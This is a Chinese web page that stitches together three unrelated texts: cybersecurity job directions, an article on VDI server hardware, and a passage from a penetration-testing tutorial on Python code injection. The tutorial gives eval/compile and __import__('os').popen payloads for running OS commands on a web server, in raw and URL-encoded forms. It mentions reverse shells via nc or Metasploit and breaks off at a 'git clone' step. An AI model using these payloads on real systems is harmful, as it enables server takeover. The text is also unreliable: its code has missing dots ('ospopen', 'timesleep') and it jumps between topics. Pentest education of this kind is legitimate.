网络安全都有哪些就业方向?

网络安全都有哪些就业方向?,第1张

就业方向如下:

第一、网站维护员

由于有些知名度比较高的网站,每天的工作量和资料信息量都是十分庞大的,所以在网站正常运行状态中肯定会出现各种问题,比如一些数据丢失甚至是崩溃都是有可能出现的,这个时候就需要一个网站维护人员,而我们通过网络安全培训学习内容也是工作上可以用到的。

第二、网络安全工程师

为了防止黑客入侵公司机密资料和保护用户的信息,许多公司都需要建设自己的网络安全工作,而网络安全工程师就是直接负责保护公司网络安全的核心人员。

第三、渗透测试工程师

渗透测试岗位主要是模拟黑客攻击,利用黑客技术,挖掘漏洞,提出修复建议。需要用到数据库、网络技术、编程技术、 *** 作系统、渗透技术、攻防技术、逆向技术等。

第四、等保测评

等保测评主要是针对目标信息系统进行安全级别评定,需要用到数据库、网络技术、 *** 作系统以及渗透技术、攻防技术等。

第五、攻防工程师

攻防工程师岗位主要是要求能够渗透能够防范,需要用到数据库、网络技术、 *** 作系统、编程技术、渗透技术等技术点。

VDI允许部署在数据中心内部的服务器向很多设备交付完整的桌面实例,包括传统PC、瘦客户端乃至零客户端设备。但每个VDI实例是由服务器处理并存储的,即使是较少的实例也可能需要大量的计算资源和网络访问。VDI部署必须先从仔细考虑服务器性能、评估服务器硬件升级需求开始。本文解释与VDI硬件要求相关的一些常见服务器问题。 有必要指出并不存在唯一的VDI硬件需求清单。问题不在于缺少支持,VDI几乎能够在当前任意一台虚拟服务器上运行。然而服务器上能够部署的VDI实例的数量受服务器可用计算资源的限制。
例如,用于企业级VDI部署的典型“白盒”服务器可能包括两个8核处理器以及至少192GB的DDR3 内存。VDI实例使用的存储很可能是集中SAN存储。但为避免存储以及VDI流量出现在同一个局域网中,SAN可能会使用单独的网络(比如FC或者单独的物理局域网)或者使用VDI服务器上的本地存储加载并保护VDI实例。这意味着VDI服务器可能需要16块转速为10-15k 的SAS 6Gbps的高性能硬盘(高度可能为2U或3U)。
性能更好的服务器可以支持更多的VDI实例,而采购较早或者性能较差的服务器支持的VDI实例数量较少。上文中列举的服务器配置可能能够支持80到130个实例,然而服务器能够支持的VDI实例的准确数量取决于其他细节比如基础镜像的大小以及复杂性、个性化程度、虚拟应用的数量、网络中用户以及应用的活跃程度等等。
看起来像是有很多实例,但一家规模足够大的采用VDI的企业可能会雇佣1000名员工或者更多—这意味着至少需要部署10台服务器,还要有额外的服务器用于支持实例数量增加以及故障切换。拥有5000名用户的企业将需要大约50台这样的物理服务器。物理服务器数量增多,hypervisor的成本以及VDI平台的许可费用也会相应增加。 VDI在一台服务器内完成所有的处理任务,仅将终端设备用作一个I/O平台(比如视频、鼠标、键盘)。因此所有的桌面以及可视化渲染工作是在主机服务器的处理器内完成的,生成的图像通过局域网转发给终端设备。渲染基本的Windows桌面会话以及其他元素通常没有任何问题,但在执行高级图形任务(比如流媒体或者3-D图形)时很可能会遇到问题。
问题恰恰是硬件支持。服务器往往省略了GPU,因为传统的服务器端任务比如文件服务器或者活动目录服务器并不使用图形。但当需要处理图形指令(比如SSE3指令)时,无法使用GPU卸载负荷—只剩下CPU使用无效率的软件仿真搞定这些指令。结果就是性能显著降低,与受影响的CPU核心相关的所有VDI实例都会受影响。由于VDI使用成熟并容纳了更多复杂的虚拟化应用,因此有必要让VDI服务器提供GPU支持以提升系统性能。
GPU往往作为一个单独的设备部署,但可以以多种不同的方式进行集成。最常见的方式是将GPU作为扩展设备安装比如PCIe适配器卡。日常办公电脑通常使用该方式,因为PCIe插槽很多而且易于访问,而且服务器能够使用功能强大的服务器级产品比如NVIDIA基于Kepler的GRID K1和K2适配器。然而服务器可能没有足够多的PCIe插槽容纳GPU适配器,GPU适配器通常非常大而且配置了一些散热风扇。数量有限的PCIe插槽可能被用于其他扩展设备比如多端口网络适配器或者存储加速。
另一个选择是使用外置GPU比如Cubix GPU-Xpander,使用一个简单、低配置的PCIe适配器连接外部、单独供电的独立GPU系统。该方法避免了过度占用服务器有限的电力供应以及PCIe插槽空间限制。
第三种方式是直接将GPU集成到处理器中,这样每个CPU插槽都能够访问其自己的GPU。例如,Intel在Xeon E3处理器中增加了GPU,并提出了改善转码性能的方案用于提升图形性能。基于ARM架构的RISC处理器同样增加了GPU用于处理图形任务。集成GPU可能是最有效的方式,因为既不会榨取服务器的电力供应也不需要使用PCIe插槽,但IT规划人员可能需要等待技术升级才能够获得对CPU/GPU进行集成的服务器。 有一些商业系统用于满足VDI硬件需求,不过这些系统更多是进行了预先封装而不是专门设计的系统。一个例子是Dell的DVS简易设备。桌面虚拟化解决方案(DVS)包基于Dell标准的PowerEdge R720或T620服务器,并与Citrix XenServer或Microsoft Hyper-V以及VDI管理工具进行了捆绑。根据报道该设备可以支持高达129个用户,而且很容易部署更多的设备以支持更多的用户。
其他VDI设备包括VMware基于VMware Horizon View的快速桌面设备,Tangent公司的 Vertex VDI设备以及Pivot3公司的vSTAC VDI设备。
由于DVS依赖于标准的服务器,并没有进行定制或者专门设计以区别传统服务器。像N+1冗余、自动故障切换、负载均衡、桌面配置以及桌面镜像管理都可以通过软件工具实现。
VDI实例支持与计算资源直接相关,但VDI硬件要求取决于桌面镜像的复杂性以及分层特性比如个性化以及应用虚拟化。上述因素使得确定每个桌面实例所需要的准确的资源数量以及给定服务器能够支持的实例数量具备相当大的挑战。这强调了企业在大规模部署VDI前,在经过良好规划的PoC项目以及规模有限的部署环境中(比如选择工作组或者部门)进行测试的必要性。

如果你的Web应用中存在Python代码注入漏洞的话,攻击者就可以利用你的Web应用来向你后台服务器的Python解析器发送恶意Python代码了。这也就意味着,如果你可以在目标服务器中执行Python代码的话,你就可以通过调用服务器的 *** 作系统的指令来实施攻击了。通过运行 *** 作系统命令,你不仅可以对那些可以访问到的文件进行读写 *** 作,甚至还可以启动一个远程的交互式Shell(例如nc、Metasploit和Empire)。
为了复现这个漏洞,我在最近的一次外部渗透测试过程中曾尝试去利用过这个漏洞。当时我想在网上查找一些关于这个漏洞具体应用方法的信息,但是并没有找到太多有价值的内容。在同事Charlie Worrell(@decidedlygray)的帮助下,我们成功地通过Burp POC实现了一个非交互式的shell,这也是我们这篇文章所要描述的内容。
因为除了Python之外,还有很多其他的语言(例如Perl和Ruby)也有可能出现代码注入问题,因此Python代码注入属于服务器端代码注入的一种。实际上,如果各位同学和我一样是一名CWE的关注者,那么下面这两个CWE也许可以给你提供一些有价值的参考内容:
1 CWE-94:代码生成控制不当(‘代码注入’)2 CWE-95:动态代码评估指令处理不当(‘Eval注入’)漏洞利用
假设你现在使用Burp或者其他工具发现了一个Python注入漏洞,而此时的漏洞利用Payload又如下所示:
eval(compile('for x in range(1):\n import time\n timesleep(20)','a','single'))那么你就可以使用下面这个Payload来在目标主机中实现 *** 作系统指令注入了:
eval(compile("""for x in range(1):\\n import os\\n ospopen(r'COMMAND')read()""",'','single'))实际上,你甚至都不需要使用for循环,直接使用全局函数“__import__”就可以了。具体代码如下所示:
eval(compile("""__import__('os')popen(r'COMMAND')read()""",'','single'))其实我们的Payload代码还可以更加简洁,既然我们已经将import和popen写在了一个表达式里面了,那么在大多数情况下,你甚至都不需要使用compile了。具体代码如下所示:
__import__('os')popen('COMMAND')read()
为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码。为了节省大家的时间,我们在这里已经将上面所列出的Payload代码编码完成了,具体如下所示:
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20timesleep%2820%29%27%2C%27a%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20ospopen%28r%27COMMAND%27%29read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=eval%28compile%28%22%22%22__import__%28%27os%27%29popen%28r%27COMMAND%27%29read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29param=__import__%28%27os%27%29popen%28%27COMMAND%27%29read%28%29接下来,我们将会给大家介绍关于这个漏洞的细节内容,并跟大家分享一个包含这个漏洞的Web应用。在文章的结尾,我将会给大家演示一款工具,这款工具是我和我的同事Charlie共同编写的,它可以明显降低你在利用这个漏洞时所花的时间。简而言之,这款工具就像sqlmap一样,可以让你快速找到SQL注入漏洞,不过这款工具仍在起步阶段,感兴趣的同学可以在项目的GitHub主页[传送门]中与我交流一下。
搭建一个包含漏洞的服务器
为了更好地给各位同学进行演示,我专门创建了一个包含漏洞的Web应用。如果你想要自己动手尝试利用这个漏洞的话,你可以点击这里获取这份Web应用。接下来,我们要配置的就是Web应用的运行环境,即通过pip或者easy_install来安装webpy。它可以作为一台独立的服务器运行,或者你也可以将它加载至包含mod_wsgi模块的Apache服务器中。相关 *** 作指令如下所示:
git clone >

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/zz/13495849.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-08-18
下一篇 2023-08-18

发表评论

登录后才能评论

评论列表(0条)

保存